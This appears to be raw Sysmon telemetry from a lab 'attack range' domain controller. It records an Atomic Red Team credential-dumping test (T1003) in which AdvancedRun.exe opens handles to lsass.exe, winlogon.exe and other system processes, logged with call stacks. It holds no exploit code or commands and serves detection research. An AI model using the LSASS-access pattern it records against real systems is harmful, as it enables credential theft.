17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952995Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952994Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952993Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003952992Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952991Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952990Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952989Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003952988Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952987Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003952986Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003952985Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952984Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952983Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952982Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952981Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003952980Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003952979Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 